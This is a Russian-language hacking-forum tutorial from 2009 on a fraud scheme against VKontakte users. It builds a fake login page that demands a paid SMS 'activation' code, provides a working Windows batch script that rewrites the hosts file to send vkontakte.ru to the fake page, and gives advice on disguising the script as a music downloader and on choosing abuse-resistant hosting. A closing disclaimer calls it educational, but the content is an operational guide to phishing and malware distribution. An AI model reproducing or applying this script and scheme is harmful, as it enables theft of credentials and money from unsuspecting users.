Создаем «умный фейк» сайта ВКонтакте, требующий SMS-активацию анкеты
Предисловие В последнее время на форумах часто появились темы о якобы становлении сайта «ВКонтакте» платным. Юзеры показывают скриншоты, где по адресу vkontakte.ru их просят отправить смс для того, чтобы получить активационный код, без которого вход невозможен. Естественно, это все проделки спамеров.
Также можно заметить, что некоторые нехорошие людишки пытаются на этом заработать, предлагая свои услуги по созданию подобных фейков. Я же не считаю эту инфу приватной, поэтому сегодня мы с вами будем пробовать новый вид обмана пользователей ВКонтакте.
Начинаем Для начала нам фейк. Я немного переделал стандартный фейк ВКонтакте под «систему активации». Выглядит он также как и главная страничка сайта, только вот вместо поля пароль появилось поле «Код активации». И сам текст заменен на следующий:
SMS-активация.
В связи с многочисленными регистрациями анонимных анкет и увеличением уровня спам-рассылок на сайте теперь каждая анкета подлежит обязательной активации.
Для того чтобы активировать свою анкету, отправьте SMS с текстом "ya ne loh” на один из следующих номеров:
- 1111 для абонентов России
-2222 для абонентов Украины
-3333 для абонентов Казахстана
-…
Стоимость SMS равна номинальной стоимости, установленной вашим оператором.
С уважением, администрация «ВКонтакте»
| Сам фейк вы можете скачать из аттача или отсюда. Только не забудьте перед заливкой отредактировать текст на свой, а то получится, что смс-ки будут слать на несуществующие номера. Далее нам нужен хостинг. В идеале - абузоустойчивый, но для обучения подойдет и любой хост с выделенным IP-адресом. Регистрируем хост, заходим по фтп, и заливаем фейк. Все, первая часть окончена. Файл hosts нам поможет Вы, наверное, уже подумали, что если просто спамить ссылку на наш фейк (а по дефолту она выглядит вот так - xxxx.freehostia.com), то процент отправивших смску будет стремиться к нулю. Поэтому мы поступим по-другому. Вы наверняка знаете о файлике hosts, который лежит в папке с Windows. В нем можно настроить редиректы различных сайтов. Так, например, там изначально стоит редирект localhost -> 127.0.0.1. Этим файлом мы и воспользуемся. Откройте блокнот и впишите туда следующий текст: @echo off
echo -- >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vkontakte.ru >> %windir%\system32\drivers\etc\hosts Сохраним этот файлик с расширением .bat (например, vkontakte.bat) и запустим. А теперь попытайтесь зайти на сайт «ВКонтакте». Ну что, открылся локалхост? Теперь заходим по ссылке http://2ip.ru/lookup.php и вбиваем туда адрес нашего фейка. Полученный IP вписываем в батник вместо 127.0.0.1. Все, теперь при попытке зайти на сайт «ВКонтакте» юзера, который запускал этот батник будет кидать на ваш фейк. Распространение «вируса» Тут уже начинается СИ. Ваше дело, как распространять батник - просто слать его пользователям или впаривать под видом программы для, например, сохранения музыки с сайта. И не забывайте о подводных камнях, вроде абуз. Удачи. Напоследок хочется сказать, что статья несет сугубо ознакомительный характер, и написана лишь для того, чтоб показать, чем на самом деле является этот «новый вирус» и как с ним бороться. Автор не несет ответственности за ваши действия, совершенные после прочтения статьи. cyanide aka ANDREJkE2H~ © 2009 (grabberz.com) Скачать файл 1 | Скачать файл 2
Источник: http://grabberz.com/showthread.php?t=18316 | 
Привет: Гость\Guest
